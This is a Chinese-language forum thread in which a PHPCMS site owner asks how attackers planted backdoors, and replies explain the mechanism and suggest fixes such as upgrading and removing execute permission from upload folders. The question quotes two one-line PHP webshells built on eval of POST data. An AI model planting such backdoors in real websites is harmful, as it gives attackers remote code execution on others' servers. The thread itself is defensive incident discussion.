搜尋

首頁  >  問答  >  主體

網站程式遭木馬【<?php eval($_POST[1]);?> ok】入侵,請求幫助探尋機理?

網站近來頻繁遭遇駭客攻擊,請求PHP大神給予協助,釐清思路,以助早日找到漏洞,解決煩憂!

現將事件經過陳述如下:

1、網站採用PHPCMS_V9_5.20預設版本搭建。

2、所有檔案起先均以全開放權限存於伺服器根目錄。

3、後來網站被黑,入口檔案api.php和index.php被改寫。

4、植入病毒檔案為:「一句話木馬」。內容如下:

<?php @eval($_POST['dcs-19']);?>
<?php
##5、發現問題,刪除以後,將此類檔案的權限鎖死,以為就能解決問題。但隔幾日,發現網站的快照被劫持,遂又查殺了一次木馬,結果顯示,木馬文件所在位置為伺服器根目錄下uploadfile20170527資料夾中,此文件為後台上傳附件或更新文章時按照日期自動生成。但是5月27日這天並沒有更新文章,卻出現了,請求大神給予協助,排查網站問題根源所在。

木馬內容為:

#<?php eval($_POST[1]);?>

ok

#另附:在網路上查詢了相關內容,大多數說是網站程式漏洞所致的sql注入攻擊,提示修復漏洞,但是怎麼修復啊? PHP版本線上升級會有用嗎?

本人小白非技術出生,很多東西都不懂,說的不明白的地方,問答中,我再按照你們的指示補充!

伊谢尔伦伊谢尔伦2709 天前2503

全部回覆(5)我來回復

  • 欧阳克

    欧阳克2017-06-26 10:50:58

    這句話程式碼原理很簡單,POST指的是客戶端傳送過去的數據,eval表示將這些資料當成程式碼執行。
    對駭客來說就是只需要在你網頁上的對話方塊輸入程式碼,提交以後就會實際執行。

    這只是表徵,也就是最後留下的後門,但是黑客如何進來留後門的,那可能性就太多了,說不定上傳功能有漏洞,ftp密碼被破,管理員權限被獲取,等等。最後留下這句木馬只是下次使用方便而已。

    最起碼的需要做的,是整套程式碼下載下來,遍歷一遍所有程式碼,查到所有eval 相關的地方,如非本身程式必須,全部處理掉,不然你這邊刪一個,人家在別的地方重新上傳一個,沒完沒了。第二就是堵住系統管理漏洞,伺服器各項元件能更新的就更新,所有密碼全都改掉使用隨機強密碼,然後在伺服器裝個防毒軟體,我記得以前用過 Linux 伺服器一個開源的。 。忘了名字你搜尋下就好。

    最後,實在不行就交給專業的人處理,看投資值不值得了,我記得外國有網站是提供木馬查殺,變動監控服務的,好像一兩百美金一年,挺貴。國內不知道有沒有相同的服務。

    回覆
    0
  • 阿神

    阿神2017-06-26 10:50:58

    關於PHPCMS漏洞的通知
    尊敬的使用者:
    您好!
    今年四月PHPCMS程式曝光的最新漏洞,可以透過修改會員註冊參數向網站注入PHP木馬檔案。透過我司測試發現,註冊會員時,PHPCMS會將註冊資訊加密,然後再傳遞到伺服器上進行會員註冊操作,由於加密方式暫時無法破解,因此我司無法透過匹配對應的關鍵字來攔截駭客入侵;
    目前解決方案有三種:

    1. 升級到最新的PHPCMS程式;

    2. 關閉網站上的會員註冊功能;

    3. 取消uploadfile目錄的執行權限(此方法可以避免木馬執行,但無法避免木馬文件上傳);
      執行上述任一方案後,請徹底檢查uploadfile目錄及子目錄,是否含有PHP文件,此目錄為上傳圖片的圖片保存目錄,如果發現存在PHP文件,則一定為木馬文件!請及時刪除!

    景安網
    2017.6.19

    回覆
    0
  • 给我你的怀抱

    给我你的怀抱2017-06-26 10:50:58

    換伺服器密碼,換SSH預設端口,能換伺服器換伺服器。換PHPCMS,5,6年前都停止更新了。肯定漏洞不少。

    回覆
    0
  • typecho

    typecho2017-06-26 10:50:58

    權限問題,你的上傳目錄開了可執行權限。
    解決問題的方法麼,排除PHPCMS的漏洞之外,你需要將所以外部檔案(不是你自己寫的或框架的程式碼)目錄的可執行權限去掉。

    chmod -R 644 upload

    回覆
    0
  • 滿天的星座

    滿天的星座2017-06-26 10:50:58

    樓上兩位回覆:你的上傳目錄開了可執行權限取消uploadfile目錄的執行權限
    這是什麼意思?都取消目錄執行權限了,目錄都打不開,自己要上傳圖片都上傳不了,那還行?

    回覆
    0
  • 取消回覆